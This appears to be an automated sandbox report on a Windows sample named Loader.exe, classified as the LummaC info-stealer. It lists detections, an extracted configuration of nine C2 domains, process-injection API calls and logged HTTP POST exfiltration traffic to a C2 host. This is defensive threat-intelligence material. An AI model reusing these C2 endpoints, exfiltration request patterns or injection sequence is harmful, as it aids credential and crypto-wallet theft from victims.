Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:	Loader.exe
Analysis ID:	1541479
MD5:	c92baaa9c4217759880a0ff0904695d9
SHA1:	3902c5a7a6e557ab736d2b0e65c55f3f8b5a7b7b
SHA256:	c72d1af1710785874f9c4bb686c4b7dfb89de050fb2c189898432247d8cfe386
Tags:	exeuser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file has nameless sections

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Loader.exe (PID: 7224 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: C92BAAA9C4217759880A0FF0904695D9)

conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aspnet_regiis.exe (PID: 7388 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["activedomest.sbs", "definitib.sbs", "withdrwblon.cyou", "elaboretib.sbs", "offybirhtdi.sbs", "mediavelk.sbs", "ostracizez.sbs", "strikebripm.sbs", "arenbootk.sbs"], "Build id": "HpOoIh--@qjwo1"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Loader.exe PID: 7224	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7388	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7388	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7388	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T21:51:08.218465+0200	2054653	1	A Network Trojan was detected	192.168.2.7	49699	188.114.96.3	443	TCP
2024-10-24T21:51:09.491651+0200	2054653	1	A Network Trojan was detected	192.168.2.7	49700	188.114.96.3	443	TCP
2024-10-24T21:51:20.582900+0200	2054653	1	A Network Trojan was detected	192.168.2.7	49736	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T21:51:08.218465+0200	2049836	1	A Network Trojan was detected	192.168.2.7	49699	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T21:51:09.491651+0200	2049812	1	A Network Trojan was detected	192.168.2.7	49700	188.114.96.3	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T21:51:17.453106+0200	2048094	1	Malware Command and Control Activity Detected	192.168.2.7	49720	188.114.96.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 5.2.Loader.exe.6d7f4000.5.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["activedomest.sbs", "definitib.sbs", "withdrwblon.cyou", "elaboretib.sbs", "offybirhtdi.sbs", "mediavelk.sbs", "ostracizez.sbs", "strikebripm.sbs", "arenbootk.sbs"], "Build id": "HpOoIh--@qjwo1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\msvcp110.dll

ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: Loader.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\msvcp110.dll

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Loader.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmp	String decryptor: offybirhtdi.sbs
Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmp	String decryptor: activedomest.sbs
Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmp	String decryptor: arenbootk.sbs
Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmp	String decryptor: mediavelk.sbs
Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmp	String decryptor: definitib.sbs
Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmp	String decryptor: elaboretib.sbs
Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmp	String decryptor: strikebripm.sbs
Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmp	String decryptor: ostracizez.sbs
Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmp	String decryptor: withdrwblon.cyou
Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000008.00000002.1424397817.0000000003236000.00000002.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -

Source: Loader.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49736 version: TLS 1.2

Source: Loader.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Loader.exe

Code function: 5_2_6D7E4D44 FindFirstFileExW,

5_2_6D7E4D44

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49720 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49700 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49699 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49699 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49736 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: activedomest.sbs
Source: Malware configuration extractor	URLs: definitib.sbs
Source: Malware configuration extractor	URLs: withdrwblon.cyou
Source: Malware configuration extractor	URLs: elaboretib.sbs
Source: Malware configuration extractor	URLs: offybirhtdi.sbs
Source: Malware configuration extractor	URLs: mediavelk.sbs
Source: Malware configuration extractor	URLs: ostracizez.sbs
Source: Malware configuration extractor	URLs: strikebripm.sbs
Source: Malware configuration extractor	URLs: arenbootk.sbs

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12845Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15077Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20402Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1239Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1135Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 115Host: withdrwblon.cyou

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: withdrwblon.cyou
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: withdrwblon.cyou

Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: aspnet_regiis.exe, 00000008.00000003.1350630029.000000000596B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: aspnet_regiis.exe, 00000008.00000003.1352958066.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: aspnet_regiis.exe, 00000008.00000003.1352958066.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: aspnet_regiis.exe, 00000008.00000003.1348659467.000000000594E000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1411298541.00000000036BF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423102544.0000000003653000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423075609.0000000005950000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1373752411.0000000005953000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1373823973.0000000005950000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/
Source: aspnet_regiis.exe, 00000008.00000003.1373852192.00000000036B1000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1373768479.00000000036AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/Co
Source: aspnet_regiis.exe, 00000008.00000002.1425008855.00000000036BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/api
Source: aspnet_regiis.exe, 00000008.00000003.1393784209.00000000036BD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1411298541.00000000036BF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423519992.00000000036BF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1425008855.00000000036BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/api(w
Source: aspnet_regiis.exe, 00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/apie
Source: aspnet_regiis.exe, 00000008.00000003.1329981970.00000000036A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/apied
Source: aspnet_regiis.exe, 00000008.00000003.1392151745.00000000036AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/apih
Source: aspnet_regiis.exe, 00000008.00000003.1348748371.0000000005958000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1348659467.000000000594E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/apiqpv
Source: aspnet_regiis.exe, 00000008.00000002.1424717867.0000000003653000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423102544.0000000003653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/apixi
Source: aspnet_regiis.exe, 00000008.00000003.1373056224.0000000005950000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1391970997.0000000005955000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1373694057.0000000005950000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1373752411.0000000005953000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/w
Source: aspnet_regiis.exe, 00000008.00000002.1424717867.0000000003653000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423102544.0000000003653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou/x_
Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000008.00000003.1373768479.00000000036AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://withdrwblon.cyou:443/api
Source: aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: aspnet_regiis.exe, 00000008.00000003.1314014221.000000000598B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: aspnet_regiis.exe, 00000008.00000003.1352958066.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: aspnet_regiis.exe, 00000008.00000003.1352958066.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: aspnet_regiis.exe, 00000008.00000003.1352958066.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: aspnet_regiis.exe, 00000008.00000003.1352958066.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: aspnet_regiis.exe, 00000008.00000003.1352958066.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49736 version: TLS 1.2

System Summary

PE file has nameless sections

Source: Loader.exe

Static PE information: section name:

Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7C45A0 GetGameData,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,CreateProcessW,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,CloseHandle,		5_2_6D7C45A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7C0A10 GetModuleHandleW,NtQueryInformationProcess,		5_2_6D7C0A10

Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7C45A0	5_2_6D7C45A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7BEA30	5_2_6D7BEA30
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7C0A10	5_2_6D7C0A10
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D0550	5_2_6D7D0550
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D2D30	5_2_6D7D2D30
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D2510	5_2_6D7D2510
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7CBD00	5_2_6D7CBD00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7CD500	5_2_6D7CD500
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7B25D0	5_2_6D7B25D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7B6DC0	5_2_6D7B6DC0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7C15C0	5_2_6D7C15C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D4DA0	5_2_6D7D4DA0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7DCD90	5_2_6D7DCD90
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D1D90	5_2_6D7D1D90
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7BB460	5_2_6D7BB460
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D9450	5_2_6D7D9450
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D3C00	5_2_6D7D3C00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7BCCE0	5_2_6D7BCCE0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7CA4B0	5_2_6D7CA4B0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7CDCB0	5_2_6D7CDCB0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7DBC90	5_2_6D7DBC90
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D7760	5_2_6D7D7760
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7BD750	5_2_6D7BD750
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7BFF00	5_2_6D7BFF00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7DAFF0	5_2_6D7DAFF0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7CB7C0	5_2_6D7CB7C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7CCFA0	5_2_6D7CCFA0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7C2780	5_2_6D7C2780
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7DB670	5_2_6D7DB670
